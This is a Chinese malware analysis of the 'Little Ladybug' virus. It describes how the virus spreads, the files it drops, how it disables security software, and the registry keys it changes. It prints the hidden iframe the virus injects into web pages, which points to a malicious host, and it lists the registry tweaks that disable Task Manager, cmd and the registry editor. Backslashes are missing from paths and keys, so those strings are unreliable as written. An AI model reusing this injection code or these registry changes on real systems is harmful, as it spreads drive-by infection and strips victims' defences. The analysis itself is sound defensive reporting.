专家解析“小瓢虫”病毒　危害可比熊猫烧香

　　这个病毒看起来象熊猫烧香和AV终结者的结合体，阳光以前曾给过一个详细的分析。如果这个病毒把感染做的完美些(现在病毒还不是真正意义上的感染，是用病毒体完全覆盖正常EXE)，会不会造成和李俊版熊猫烧香一样的效果呢，完全有可能。

　　以下是关于该病毒的详细分析报告：

　　一、病毒信息

　　病毒名：Win32.Troj.Serwer.yx

　　病毒中文名称：小瓢虫

　　二、病毒行为

　　这是一个感染型病毒，把会计算机上的系统时间改为 2030 年，在系统盘的system32文件夹下释放多个病毒文件。

　　在计算机上的每个盘下生成SDGames.exe和Autorun.inf两个文件，以达到通过双击该盘时病毒可以运行起来。

　　在每个盘下生成三个Url文件，都指向该盘下的SDGame.exe文件，三个Url文件具有迷惑性的图标。可以查看这三个URL的属性，会发现都指向c:sdgame.exe。

　　通过添加注册表启动项以达到开机时病毒能运行起来，通过修改注册表破坏系统安全模式，禁用大部分系统功能，包括：禁用任务管理器、禁用控制面板、禁止修改系统配置、锁定主页、禁用注册表编辑器等。

　　映像劫持了大量软件，被劫持的软件包括“杀毒软件”、“系统检测工具”、“QQ”。(连QQ都不让用，这病毒够BT)

　　感染计算机上的 exe 文件，感染方式为覆盖数据。(除系统盘外，其它盘的EXE都被替换为小瓢虫图标)

　　感染计算机上的 hta、html、htm、jsp、php、asp 后缀的文件，插入网页代码。 (除系统盘外，这一点和熊猫烧香的传播方式相同，有可能会造成网站大面积挂马)

　　把计算机上的所有盘设为所有人完全共享。(这是尼姆达病毒最常用的手段，当然，目的就是在局域网中大面积传播了)

　　病毒运行后释放以下文件：

%systemroot%system32Taskeep.vbs
%systemroot%system32SDGames.exe
%systemroot%system32Avpser.cmd
%systemroot%system32
etshare.cmd
%systemroot%system32AUTORUN.INF

　　Taskeep.vbs 的作用是运行起病毒进程；

　　netshare.cmd 的作用是打开本机的共享；

　　Avpser.cmd 用于结束计算机上的大量杀毒软件、安全检测软件，常见杀毒软件都在被攻击之列。

　　病毒在计算机上的每个盘下生成SDGame.exe和Autorun.inf，并生成 Recycleds.url、Windows.url，新建文件夹.url三个文件，诱使用户双击。这三个文件都指向该盘下的SDGame.exe文件。(Recycleds.url 的图标为“回收站”，其余两个图标为“文件夹图标”)

　　病毒创建注册表启动项，添加服务；

　　把计算机上为以下后缀名的文件插入代码：(除系统盘外)

".hta"
".html"
".htm"
".php"
".asp"
".jsp"

　　插入的代码：

iframe id="iframe" width="0" height="0" scrolling="no"
frameborder="0" src="http://zhidaobaidu.10mb.cn/" name="Myframe" align="center" border="0"

　　感染计算机上的 exe 文件，感染方式为覆盖数据。(除系统盘，被感染后的 exe 文件图标为绿色的小飘虫)

　　修改计算机上的 reg 和 txt 文件关联指向“%systemroot%system32SDGames.exe”。

　　把计算机上的系统时间改为 2030 年，中国木马制作者的惯用手法。

　　通过修改注册表的方式破坏安全模式。

　　禁用cmd：

HKEY_CURRENT_USERSoftwarePoliciesMicrosoftWindowsSystemDisableCMD

　　破坏显示隐藏文件：

HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionExplorerAdvancedHidden
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionExplorerAdvancedFolder
HiddenSHOWALLCheckedValue

　　使得文件扩展名无法显示：

HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionExplorerAdvancedHideFileExt

　　隐藏控制面板：

HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerNoControlPanel

　　禁用注册表编辑器：

HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionPoliciesSystemDisableRegistrytools

　　禁用任务管理器：

HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionPoliciesSystemDisableTaskMgr

　　修改IE主页为：

http:/ /www.zhidaobaidu.10mb.cn

　　隐藏文件夹选项：

HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerNoFolderOptions

　　映像劫持常用安全软件，这次连杀毒软件的命令行查毒都没放过。